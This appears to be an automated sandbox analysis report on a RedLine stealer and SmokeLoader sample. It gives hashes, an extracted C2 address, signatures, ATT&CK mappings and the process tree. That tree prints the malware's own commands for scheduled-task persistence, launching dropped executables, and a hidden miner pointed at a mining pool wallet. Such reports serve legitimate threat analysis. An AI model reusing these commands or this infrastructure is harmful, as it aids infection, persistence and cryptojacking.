Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08-12-2022 04:29

General

  • Target

    90d70b426aec7a96bfa5bbc20ea1f5e45fda645c78c1c8b8793cef137a633ea3.exe

  • Size

    263KB

  • MD5

    d90cfbe2b472cf48e7e666ce85a21b4c

  • SHA1

    475b8970442894bbd8f3fef2562b4793e5160984

  • SHA256

    90d70b426aec7a96bfa5bbc20ea1f5e45fda645c78c1c8b8793cef137a633ea3

  • SHA512

    bbfcc55455d5da0878a69faa15513d456e0222099c281289f7f25316e642e4a1220ea47707f7cdceb09627e26bb3b7bc06003c01a133966660a8c94cd02bd5f5

  • SSDEEP

    3072:eFOzoEWLrEqV4TjR585dH3TdIEp0mMlQS+Is/RozBpRLYJEHD/xjfTBQgnTLSZk3:ehEv/ITrK+F/Ro3iJkzxCOgdxm

Malware Config

Extracted

Family

redline

Botnet

YT

C2

65.21.5.58:48811

Attributes
  • auth_value

    fb878dde7f3b4ad1e1bc26d24db36d28

Signatures

  • Detects Smokeloader packer 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\90d70b426aec7a96bfa5bbc20ea1f5e45fda645c78c1c8b8793cef137a633ea3.exe
    "C:\Users\Admin\AppData\Local\Temp\90d70b426aec7a96bfa5bbc20ea1f5e45fda645c78c1c8b8793cef137a633ea3.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3512
  • C:\Users\Admin\AppData\Local\Temp\3C4D.exe
    C:\Users\Admin\AppData\Local\Temp\3C4D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4384
    • C:\Users\Admin\AppData\Local\Temp\218378987-8a9Ah054og8jEcGP.exe
      "C:\Users\Admin\AppData\Local\Temp\218378987-8a9Ah054og8jEcGP.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\System32\Wbem\wmic.exe
        wmic os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3076
      • C:\Windows\system32\cmd.exe
        cmd /C "wmic path win32_VideoController get name"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3928
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic path win32_VideoController get name
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4788
      • C:\Windows\system32\cmd.exe
        cmd /C "wmic cpu get name"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1536
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic cpu get name
          4⤵
            PID:4812
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell "" "start-process C:\Users\Admin\AppData\Local\Temp\t6wL7m9K41.exe"
          3⤵
            PID:4888
            • C:\Users\Admin\AppData\Local\Temp\t6wL7m9K41.exe
              "C:\Users\Admin\AppData\Local\Temp\t6wL7m9K41.exe"
              4⤵
              • Executes dropped EXE
              PID:1904
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF7BE.tmp.bat""
                5⤵
                  PID:4084
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    6⤵
                    • Delays execution with timeout.exe
                    PID:4552
                  • C:\ProgramData\SystemInformation\V.exe
                    "C:\ProgramData\SystemInformation\V.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4924
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"
                      7⤵
                        PID:3312
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"
                          8⤵
                          • Creates scheduled task(s)
                          PID:2368
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RCMiP9SrgQ54AMjhmbUTCtkeoHVVHvADHw.spaceteam -p x -t 5
                        7⤵
                          PID:4596
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c cls
                            8⤵
                              PID:2676
              • C:\Users\Admin\AppData\Local\Temp\4622.exe
                C:\Users\Admin\AppData\Local\Temp\4622.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4368
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  2⤵
                    PID:3112
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 508
                    2⤵
                    • Program crash
                    PID:4164
                • C:\Users\Admin\AppData\Local\Temp\5006.exe
                  C:\Users\Admin\AppData\Local\Temp\5006.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3156
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                    2⤵
                      PID:4840
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 500
                      2⤵
                      • Program crash
                      PID:4860
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:3888
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:4008
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:2312
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:4604
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:4752
                            • C:\Users\Admin\AppData\Roaming\hjihaue
                              C:\Users\Admin\AppData\Roaming\hjihaue
                              1⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:552
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:676
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:4408
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  1⤵
                                    PID:1592
                                  • C:\Windows\SysWOW64\explorer.exe
                                    C:\Windows\SysWOW64\explorer.exe
                                    1⤵
                                      PID:2332

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v6

                                    Execution

                                    Scripting

                                    1
                                    T1064

                                    Scheduled Task

                                    1
                                    T1053

                                    Persistence

                                    Scheduled Task

                                    1
                                    T1053

                                    Privilege Escalation

                                    Scheduled Task

                                    1
                                    T1053

                                    Defense Evasion

                                    Scripting

                                    1
                                    T1064

                                    Credential Access

                                    Credentials in Files

                                    2
                                    T1081

                                    Discovery

                                    System Information Discovery

                                    2
                                    T1082

                                    Query Registry

                                    1
                                    T1012

                                    Peripheral Device Discovery

                                    1
                                    T1120

                                    Collection

                                    Data from Local System

                                    2
                                    T1005

                                    Command and Control

                                    Web Service

                                    1
                                    T1102

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\ProgramData\SystemInformation\V.exe
                                      Filesize

                                      892KB

                                      MD5

                                      6bcdb0510f46aa502aef2378f79434bf

                                      SHA1

                                      f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                      SHA256

                                      8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                      SHA512

                                      73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                                    • C:\ProgramData\SystemInformation\V.exe
                                      Filesize

                                      892KB

                                      MD5

                                      6bcdb0510f46aa502aef2378f79434bf

                                      SHA1

                                      f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                      SHA256

                                      8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                      SHA512

                                      73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                                    • C:\Users\Admin\AppData\Local\Temp\218378987-8a9Ah054og8jEcGP.exe
                                      Filesize

                                      4.5MB

                                      MD5

                                      210d0e2a6972569ae0cc2e191610ede7

                                      SHA1

                                      74080b265b2f29cc0d2fac5b02034a9c4b6c9f22

                                      SHA256

                                      bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d

                                      SHA512

                                      d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a

                                    • C:\Users\Admin\AppData\Local\Temp\218378987-8a9Ah054og8jEcGP.exe
                                      Filesize

                                      4.5MB

                                      MD5

                                      210d0e2a6972569ae0cc2e191610ede7

                                      SHA1

                                      74080b265b2f29cc0d2fac5b02034a9c4b6c9f22

                                      SHA256

                                      bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d

                                      SHA512

                                      d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a

                                    • C:\Users\Admin\AppData\Local\Temp\3C4D.exe
                                      Filesize

                                      922KB

                                      MD5

                                      0cec15477b0a89e89f78961fdd2f56b8

                                      SHA1

                                      48701957b74b12cfb521c8881ec9beac78f8866d

                                      SHA256

                                      03de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351

                                      SHA512

                                      1c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595

                                    • C:\Users\Admin\AppData\Local\Temp\3C4D.exe
                                      Filesize

                                      922KB

                                      MD5

                                      0cec15477b0a89e89f78961fdd2f56b8

                                      SHA1

                                      48701957b74b12cfb521c8881ec9beac78f8866d

                                      SHA256

                                      03de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351

                                      SHA512

                                      1c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595

                                    • C:\Users\Admin\AppData\Local\Temp\4622.exe
                                      Filesize

                                      750KB

                                      MD5

                                      bba5e9388aceb3c1c83638a42cee6b13

                                      SHA1

                                      7538b896c3898f11e372e67accc83a598dacb29d

                                      SHA256

                                      4255c0f0323f7b4b901bafeb51a5c7befce1043684bdfb9f504b2c1213b9be59

                                      SHA512

                                      ebc14ccc6089d3ced0ed0619df5c56ea67cea5b15e564123c5fd825f77a7e59199748a5d523733b5b0f32813f14fc8dfa2f963053237a0c3c7e4affa553cd8cd

                                    • C:\Users\Admin\AppData\Local\Temp\4622.exe
                                      Filesize

                                      750KB

                                      MD5

                                      bba5e9388aceb3c1c83638a42cee6b13

                                      SHA1

                                      7538b896c3898f11e372e67accc83a598dacb29d

                                      SHA256

                                      4255c0f0323f7b4b901bafeb51a5c7befce1043684bdfb9f504b2c1213b9be59

                                      SHA512

                                      ebc14ccc6089d3ced0ed0619df5c56ea67cea5b15e564123c5fd825f77a7e59199748a5d523733b5b0f32813f14fc8dfa2f963053237a0c3c7e4affa553cd8cd

                                    • C:\Users\Admin\AppData\Local\Temp\5006.exe
                                      Filesize

                                      3.1MB

                                      MD5

                                      df1aa71fc7fe2bc39f71b48b45d1a255

                                      SHA1

                                      9936734a8693be6429e66f3011584a9fc8094607

                                      SHA256

                                      731fd196273e43c2d4ed578599d645bd0c297eb8dcce7ac79d5c968e0ba92e0f

                                      SHA512

                                      abaae0d6df9f892a10808a7a7e532426c4f8c7b18771d902a5e2727b7c8dd1c2133ba3b3c488815da1b5da5b2b383180ebf87af4580fb04dab94c209d0ad75a2

                                    • C:\Users\Admin\AppData\Local\Temp\5006.exe
                                      Filesize

                                      3.1MB

                                      MD5

                                      df1aa71fc7fe2bc39f71b48b45d1a255

                                      SHA1

                                      9936734a8693be6429e66f3011584a9fc8094607

                                      SHA256

                                      731fd196273e43c2d4ed578599d645bd0c297eb8dcce7ac79d5c968e0ba92e0f

                                      SHA512

                                      abaae0d6df9f892a10808a7a7e532426c4f8c7b18771d902a5e2727b7c8dd1c2133ba3b3c488815da1b5da5b2b383180ebf87af4580fb04dab94c209d0ad75a2

                                    • C:\Users\Admin\AppData\Local\Temp\t6wL7m9K41.exe
                                      Filesize

                                      892KB

                                      MD5

                                      6bcdb0510f46aa502aef2378f79434bf

                                      SHA1

                                      f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                      SHA256

                                      8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                      SHA512

                                      73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                                    • C:\Users\Admin\AppData\Local\Temp\t6wL7m9K41.exe
                                      Filesize

                                      892KB

                                      MD5

                                      6bcdb0510f46aa502aef2378f79434bf

                                      SHA1

                                      f46e3ca6042354f2d81228d3648e8ba5c96b7867

                                      SHA256

                                      8b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b

                                      SHA512

                                      73b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63

                                    • C:\Users\Admin\AppData\Local\Temp\tmpF7BE.tmp.bat
                                      Filesize

                                      147B

                                      MD5

                                      3d9dbacd9e990ccb99db6e4691fa93f6

                                      SHA1

                                      6805a33ab61d3e8f9a69d40b43c984059219b221

                                      SHA256

                                      ecf8ef92f4cbb926bf98c5ff96842f445e89e96900ad88af2e85185ce6ccb7df

                                      SHA512

                                      5b5171fd4d81bc229b6f7c40cbeb55083ae2ef642b31b2557e9360eb069335dd54a3180980356988c801b683a577008bf1f2b7422478d93e67ceaecd20ae9fbb

                                    • C:\Users\Admin\AppData\Roaming\hjihaue
                                      Filesize

                                      263KB

                                      MD5

                                      d90cfbe2b472cf48e7e666ce85a21b4c

                                      SHA1

                                      475b8970442894bbd8f3fef2562b4793e5160984

                                      SHA256

                                      90d70b426aec7a96bfa5bbc20ea1f5e45fda645c78c1c8b8793cef137a633ea3

                                      SHA512

                                      bbfcc55455d5da0878a69faa15513d456e0222099c281289f7f25316e642e4a1220ea47707f7cdceb09627e26bb3b7bc06003c01a133966660a8c94cd02bd5f5

                                    • C:\Users\Admin\AppData\Roaming\hjihaue
                                      Filesize

                                      263KB

                                      MD5

                                      d90cfbe2b472cf48e7e666ce85a21b4c

                                      SHA1

                                      475b8970442894bbd8f3fef2562b4793e5160984

                                      SHA256

                                      90d70b426aec7a96bfa5bbc20ea1f5e45fda645c78c1c8b8793cef137a633ea3

                                      SHA512

                                      bbfcc55455d5da0878a69faa15513d456e0222099c281289f7f25316e642e4a1220ea47707f7cdceb09627e26bb3b7bc06003c01a133966660a8c94cd02bd5f5

                                    • memory/552-847-0x0000000000550000-0x000000000069A000-memory.dmp
                                      Filesize

                                      1.3MB

                                    • memory/552-848-0x0000000000400000-0x000000000045E000-memory.dmp
                                      Filesize

                                      376KB

                                    • memory/552-884-0x0000000000400000-0x000000000045E000-memory.dmp
                                      Filesize

                                      376KB

                                    • memory/552-846-0x0000000000550000-0x000000000069A000-memory.dmp
                                      Filesize

                                      1.3MB

                                    • memory/676-372-0x0000000000000000-mapping.dmp
                                    • memory/676-624-0x00000000030A0000-0x00000000030A5000-memory.dmp
                                      Filesize

                                      20KB

                                    • memory/676-647-0x0000000003090000-0x0000000003099000-memory.dmp
                                      Filesize

                                      36KB

                                    • memory/1536-754-0x0000000000000000-mapping.dmp
                                    • memory/1592-434-0x0000000000000000-mapping.dmp
                                    • memory/1592-667-0x00000000012B0000-0x00000000012B7000-memory.dmp
                                      Filesize

                                      28KB

                                    • memory/1592-449-0x00000000012A0000-0x00000000012AD000-memory.dmp
                                      Filesize

                                      52KB

                                    • memory/1592-444-0x00000000012B0000-0x00000000012B7000-memory.dmp
                                      Filesize

                                      28KB

                                    • memory/1904-869-0x0000000000000000-mapping.dmp
                                    • memory/1904-872-0x00000000001D0000-0x00000000002B4000-memory.dmp
                                      Filesize

                                      912KB

                                    • memory/2312-297-0x0000000000000000-mapping.dmp
                                    • memory/2312-522-0x0000000000A20000-0x0000000000A29000-memory.dmp
                                      Filesize

                                      36KB

                                    • memory/2312-690-0x0000000000A30000-0x0000000000A35000-memory.dmp
                                      Filesize

                                      20KB

                                    • memory/2312-517-0x0000000000A30000-0x0000000000A35000-memory.dmp
                                      Filesize

                                      20KB

                                    • memory/2332-663-0x0000000000320000-0x000000000032B000-memory.dmp
                                      Filesize

                                      44KB

                                    • memory/2332-466-0x0000000000000000-mapping.dmp
                                    • memory/2332-662-0x0000000000330000-0x0000000000338000-memory.dmp
                                      Filesize

                                      32KB

                                    • memory/2332-713-0x0000000000330000-0x0000000000338000-memory.dmp
                                      Filesize

                                      32KB

                                    • memory/2368-1133-0x0000000000000000-mapping.dmp
                                    • memory/2676-1251-0x0000000000000000-mapping.dmp
                                    • memory/3076-691-0x0000000000000000-mapping.dmp
                                    • memory/3112-809-0x0000000009040000-0x000000000907E000-memory.dmp
                                      Filesize

                                      248KB

                                    • memory/3112-706-0x000000000041B576-mapping.dmp
                                    • memory/3112-804-0x0000000009550000-0x0000000009B56000-memory.dmp
                                      Filesize

                                      6.0MB

                                    • memory/3112-807-0x0000000008FE0000-0x0000000008FF2000-memory.dmp
                                      Filesize

                                      72KB

                                    • memory/3112-779-0x0000000000400000-0x0000000000432000-memory.dmp
                                      Filesize

                                      200KB

                                    • memory/3112-1139-0x000000000AE30000-0x000000000B35C000-memory.dmp
                                      Filesize

                                      5.2MB

                                    • memory/3112-882-0x0000000009470000-0x00000000094D6000-memory.dmp
                                      Filesize

                                      408KB

                                    • memory/3112-1138-0x000000000A730000-0x000000000A8F2000-memory.dmp
                                      Filesize

                                      1.8MB

                                    • memory/3112-811-0x00000000091C0000-0x000000000920B000-memory.dmp
                                      Filesize

                                      300KB

                                    • memory/3112-874-0x000000000A060000-0x000000000A55E000-memory.dmp
                                      Filesize

                                      5.0MB

                                    • memory/3112-873-0x00000000093D0000-0x0000000009462000-memory.dmp
                                      Filesize

                                      584KB

                                    • memory/3112-805-0x00000000090B0000-0x00000000091BA000-memory.dmp
                                      Filesize

                                      1.0MB

                                    • memory/3156-231-0x0000000000000000-mapping.dmp
                                    • memory/3156-716-0x0000000000870000-0x0000000000B89000-memory.dmp
                                      Filesize

                                      3.1MB

                                    • memory/3312-1132-0x0000000000000000-mapping.dmp
                                    • memory/3512-152-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-143-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-126-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-127-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-128-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-129-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-131-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-154-0x0000000000400000-0x000000000045E000-memory.dmp
                                      Filesize

                                      376KB

                                    • memory/3512-153-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-130-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-151-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-150-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-149-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-147-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-132-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-148-0x0000000000400000-0x000000000045E000-memory.dmp
                                      Filesize

                                      376KB

                                    • memory/3512-123-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-146-0x0000000000640000-0x0000000000649000-memory.dmp
                                      Filesize

                                      36KB

                                    • memory/3512-122-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-121-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-120-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-125-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-119-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-118-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-133-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-117-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-145-0x0000000000460000-0x000000000050E000-memory.dmp
                                      Filesize

                                      696KB

                                    • memory/3512-134-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-144-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-142-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-141-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-140-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-139-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-135-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-138-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-136-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3512-137-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/3888-380-0x0000000003140000-0x000000000314B000-memory.dmp
                                      Filesize

                                      44KB

                                    • memory/3888-376-0x0000000003150000-0x0000000003157000-memory.dmp
                                      Filesize

                                      28KB

                                    • memory/3888-664-0x0000000003150000-0x0000000003157000-memory.dmp
                                      Filesize

                                      28KB

                                    • memory/3888-265-0x0000000000000000-mapping.dmp
                                    • memory/3928-693-0x0000000000000000-mapping.dmp
                                    • memory/4008-280-0x0000000000000000-mapping.dmp
                                    • memory/4008-294-0x00000000005E0000-0x00000000005EF000-memory.dmp
                                      Filesize

                                      60KB

                                    • memory/4008-616-0x00000000005F0000-0x00000000005F9000-memory.dmp
                                      Filesize

                                      36KB

                                    • memory/4008-292-0x00000000005F0000-0x00000000005F9000-memory.dmp
                                      Filesize

                                      36KB

                                    • memory/4016-684-0x0000000000000000-mapping.dmp
                                    • memory/4084-876-0x0000000000000000-mapping.dmp
                                    • memory/4368-185-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4368-186-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4368-188-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4368-190-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4368-182-0x0000000000000000-mapping.dmp
                                    • memory/4384-179-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-174-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-155-0x0000000000000000-mapping.dmp
                                    • memory/4384-157-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-229-0x00000000028F0000-0x00000000028F6000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/4384-203-0x00000000005D0000-0x00000000006BC000-memory.dmp
                                      Filesize

                                      944KB

                                    • memory/4384-169-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-170-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-189-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-171-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-158-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-159-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-160-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-187-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-161-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-162-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-163-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-183-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-181-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-180-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-172-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-178-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-177-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-176-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-175-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-168-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-173-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-165-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-166-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4384-167-0x0000000077B00000-0x0000000077C8E000-memory.dmp
                                      Filesize

                                      1.6MB

                                    • memory/4408-401-0x0000000000000000-mapping.dmp
